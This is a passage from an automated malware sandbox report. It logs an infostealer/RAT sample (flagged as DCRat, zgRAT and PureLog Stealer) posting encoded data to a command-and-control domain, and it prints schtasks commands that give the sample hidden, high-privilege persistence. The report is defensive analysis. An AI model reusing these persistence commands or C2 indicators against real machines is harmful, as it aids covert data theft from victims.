                                                    Aug 29, 2024 23:03:52.408006907 CEST804972280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:52.477022886 CEST4972280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:52.537956953 CEST804972280.211.144.156192.168.2.5
                                                    Aug 29, 2024 23:03:52.586389065 CEST4972280192.168.2.580.211.144.156
                                                    Aug 29, 2024 23:03:52.620915890 CEST4972280192.168.2.580.211.144.156

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Aug 29, 2024 23:02:11.384500980 CEST5157753192.168.2.51.1.1.1
                                                    Aug 29, 2024 23:02:11.393321037 CEST53515771.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Aug 29, 2024 23:02:11.384500980 CEST192.168.2.51.1.1.10x70d8Standard query (0)621287cm.n9shteam2.topA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Aug 29, 2024 23:02:11.393321037 CEST1.1.1.1192.168.2.50x70d8No error (0)621287cm.n9shteam2.top80.211.144.156A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • 621287cm.n9shteam2.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.54970480.211.144.156807096C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:02:11.469942093 CEST324OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:02:11.821681976 CEST344OUTData Raw: 05 06 01 07 06 0d 01 05 05 06 02 01 02 04 01 07 00 07 05 08 02 03 03 08 01 06 0d 02 03 00 02 09 0a 03 05 0a 03 54 03 07 0b 04 04 03 00 06 05 56 05 03 0c 0a 0e 02 07 0b 07 05 07 04 01 0b 00 0b 02 00 0d 59 07 06 04 01 0b 04 0f 03 0d 53 0e 09 05 54
                                                    Data Ascii: TVYSTZVTU\L}R|^XNt\aOaplyLvo`kcpolopv|C^cd`}O~V@@{}fA~Lq
                                                    Aug 29, 2024 23:02:12.252181053 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:02:12.255582094 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    1192.168.2.54971280.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:02:37.154726028 CEST341OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:02:37.508162022 CEST344OUTData Raw: 00 0b 01 00 06 09 04 07 05 06 02 01 02 0d 01 0b 00 0b 05 0a 02 01 03 08 00 0f 0d 54 06 50 06 00 0e 0e 04 5c 07 06 05 03 0f 03 07 0a 06 53 05 05 04 06 0c 0c 0d 55 04 55 05 0e 04 04 04 0b 07 00 00 0b 0f 5a 05 00 07 51 0f 02 0c 02 0e 03 0e 03 07 00
                                                    Data Ascii: TP\SUUZQS]TQ\L~p~N`\SMuuQP~|~Xtl_|]c^los{ce_|~tAtYQ[}e~V@z}PO~bq
                                                    Aug 29, 2024 23:02:37.840049028 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:02:37.971899986 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    2192.168.2.54971380.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:02:44.321713924 CEST341OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:02:44.680301905 CEST344OUTData Raw: 00 05 04 04 06 08 01 0b 05 06 02 01 02 0d 01 02 00 0b 05 0c 02 07 03 01 01 0e 0e 06 05 07 03 52 0e 04 04 0c 03 03 06 00 0e 51 02 01 05 00 04 56 07 03 0d 00 0e 04 06 02 04 55 07 0d 07 03 06 08 05 0b 0e 59 05 51 06 53 0b 0e 0f 07 0d 54 0d 01 04 0c
                                                    Data Ascii: RQVUYQSTP\L~|`}^c[mbeURko}OwR`]tJ{BgH{prDmoR`^lje~V@xmP}L[
                                                    Aug 29, 2024 23:02:45.017760992 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:02:45.147178888 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    3192.168.2.54971580.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:02:53.121233940 CEST341OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:02:53.476984024 CEST344OUTData Raw: 00 0b 01 06 03 0d 01 06 05 06 02 01 02 04 01 0a 00 02 05 0c 02 05 03 0e 02 02 0e 54 04 00 01 06 0e 0e 03 0c 01 02 05 05 0f 04 05 0a 06 04 05 03 06 0b 0c 00 0e 02 06 52 06 54 05 54 06 52 04 01 01 03 0c 09 04 01 05 09 0c 53 0e 00 0c 06 0c 09 07 50
                                                    Data Ascii: TRTTRSP\L~A|N[[cq~\vKxBhl[t`Oh]{_olo`zDhSsQwlLiO~V@@zmr}bi
                                                    Aug 29, 2024 23:02:53.795125961 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:02:53.923660994 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    4192.168.2.54971680.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:02:56.757767916 CEST276OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:02:57.102014065 CEST344OUTData Raw: 00 0a 04 0d 06 0e 01 03 05 06 02 01 02 07 01 0b 00 02 05 01 02 06 03 0b 01 00 0e 02 07 01 00 08 0e 0f 07 0e 07 0d 04 06 0e 04 04 05 05 0a 02 00 04 07 0b 0c 0d 01 04 55 06 04 04 51 07 07 04 01 03 06 0c 09 07 05 04 54 0f 0e 0c 57 0e 06 0c 08 05 56
                                                    Data Ascii: UQTWVT\L~N~sjw[uLaoS|it|M`xo{Eo`e^|SlAwttiO~V@Az}r}\}
                                                    Aug 29, 2024 23:02:57.493792057 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:02:57.681051970 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    5192.168.2.54971780.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:03:00.331306934 CEST324OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:00.680107117 CEST344OUTData Raw: 00 01 04 03 06 0a 01 03 05 06 02 01 02 03 01 06 00 07 05 00 02 05 03 01 07 05 0a 01 04 05 02 02 0f 05 06 5a 02 51 03 0a 0e 54 07 51 04 07 05 52 04 51 0f 0c 0d 07 07 07 06 07 06 51 07 03 00 0f 00 05 0d 0d 07 0f 01 00 0b 04 0b 0e 0c 06 0d 06 02 03
                                                    Data Ascii: ZQTQRQQP\L}RYfwv]uK`@|o}wls_hloR^Yx`e_|}hNtIZ~e~V@{mf}b[
                                                    Aug 29, 2024 23:03:00.990461111 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:01.121143103 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    6192.168.2.54971880.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:03:09.064832926 CEST323OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:09.414546967 CEST344OUTData Raw: 00 01 04 01 06 09 04 07 05 06 02 01 02 03 01 00 00 04 05 0c 02 06 03 0d 02 52 0e 0d 03 04 01 03 0e 01 05 0d 02 0c 04 01 0c 53 07 03 07 00 07 54 06 54 0f 0e 0a 0e 06 02 01 05 04 50 01 07 06 08 01 07 0a 08 07 55 04 51 0f 0e 0d 0e 0c 01 0d 02 04 07
                                                    Data Ascii: RSTTPUQX\L~@~`jMcryvvlA|lyMtoYsk^xl{Eos}Z|S`vgZA}O~V@xCT}\e
                                                    Aug 29, 2024 23:03:09.726845980 CEST344OUTData Raw: 00 01 04 01 06 09 04 07 05 06 02 01 02 03 01 00 00 04 05 0c 02 06 03 0d 02 52 0e 0d 03 04 01 03 0e 01 05 0d 02 0c 04 01 0c 53 07 03 07 00 07 54 06 54 0f 0e 0a 0e 06 02 01 05 04 50 01 07 06 08 01 07 0a 08 07 55 04 51 0f 0e 0d 0e 0c 01 0d 02 04 07
                                                    Data Ascii: RSTTPUQX\L~@~`jMcryvvlA|lyMtoYsk^xl{Eos}Z|S`vgZA}O~V@xCT}\e
                                                    Aug 29, 2024 23:03:10.121911049 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:10.122101068 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:10.334460974 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:10.399142027 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    7192.168.2.54971980.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:03:34.631613016 CEST288OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:34.977133036 CEST344OUTData Raw: 05 06 04 02 06 0b 01 0a 05 06 02 01 02 0d 01 02 00 06 05 09 02 07 03 0f 02 03 0c 01 04 0e 00 00 0f 01 06 5a 01 02 06 05 0e 01 07 06 00 07 06 03 04 07 0c 5d 0a 07 04 00 06 05 06 51 05 01 04 00 01 01 0e 59 07 51 01 01 0c 53 0b 0f 0c 00 0e 08 07 57
                                                    Data Ascii: Z]QYQSW[\L~ANrc[aBvv|OhR~X`lx|spy|]E{^vDkn`tYpju~V@xmbN}LS
                                                    Aug 29, 2024 23:03:35.295924902 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:35.425847054 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    8192.168.2.54972080.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:03:43.516273975 CEST288OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:43.867964029 CEST344OUTData Raw: 05 06 01 02 06 00 04 00 05 06 02 01 02 0d 01 04 00 03 05 0f 02 03 03 00 01 04 0d 06 03 02 01 00 0e 07 03 0c 07 07 05 07 0c 53 04 0a 00 0b 05 05 07 05 0c 59 0d 05 01 01 06 00 05 54 06 56 07 0c 03 01 0e 0d 05 0e 05 06 0e 00 0e 05 0d 53 0f 05 04 03
                                                    Data Ascii: SYTVSUV\L}RhNrN`bSBuhB~ov_wU^kZtoB{Hl`~kmxtYp}O~V@{Cv~LW
                                                    Aug 29, 2024 23:03:44.184360027 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:44.328583956 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    9192.168.2.54972180.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:03:46.571973085 CEST324OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:46.930284977 CEST344OUTData Raw: 00 00 01 01 06 0b 01 01 05 06 02 01 02 01 01 01 00 07 05 0f 02 02 03 01 00 0e 0d 00 04 0f 01 04 0e 03 06 0c 03 04 06 56 0f 05 05 07 06 01 07 03 07 02 0e 0e 0e 0e 06 02 07 01 06 56 04 07 05 5a 03 02 0d 5a 07 56 01 09 0b 02 0e 54 0d 50 0e 53 06 04
                                                    Data Ascii: VVZZVTPSU\L}Uk`Pva~^vKkQ|~XwpO~c|l|x_lN~~kUcYk]ie~V@xSf~\[
                                                    Aug 29, 2024 23:03:47.254633904 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:47.389883995 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    10192.168.2.54972280.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Aug 29, 2024 23:03:51.732836008 CEST341OUTPOST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:52.086627007 CEST344OUTData Raw: 05 02 04 05 06 0f 01 06 05 06 02 01 02 04 01 04 00 00 05 01 02 00 03 0c 03 07 0e 06 05 00 00 01 0e 06 06 5c 01 03 05 52 0d 02 02 0a 00 07 05 03 05 03 0c 5d 0f 54 07 0b 04 02 07 0c 05 52 04 0d 00 03 0f 09 04 0f 06 51 0b 0e 0b 02 0e 00 0e 01 07 00
                                                    Data Ascii: \R]TRQR\L~Nkp~`aqbvwSk|WcRk]~cxlltXxszD}Qwtw_}_~V@@{Cz~ra
                                                    Aug 29, 2024 23:03:52.408006907 CEST25INHTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:52.537956953 CEST175INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:17:01:53
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                                                    Imagebase:0x30000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"
                                                    Imagebase:0x7ff6d4470000
                                                    File size:2'759'232 bytes
                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP"
                                                    Imagebase:0x7ff746120000
                                                    File size:52'744 bytes
                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"
                                                    Imagebase:0x7ff6d4470000
                                                    File size:2'759'232 bytes
                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                                                    Imagebase:0x430000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                                                    Imagebase:0xf10000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP"
                                                    Imagebase:0x7ff746120000
                                                    File size:52'744 bytes
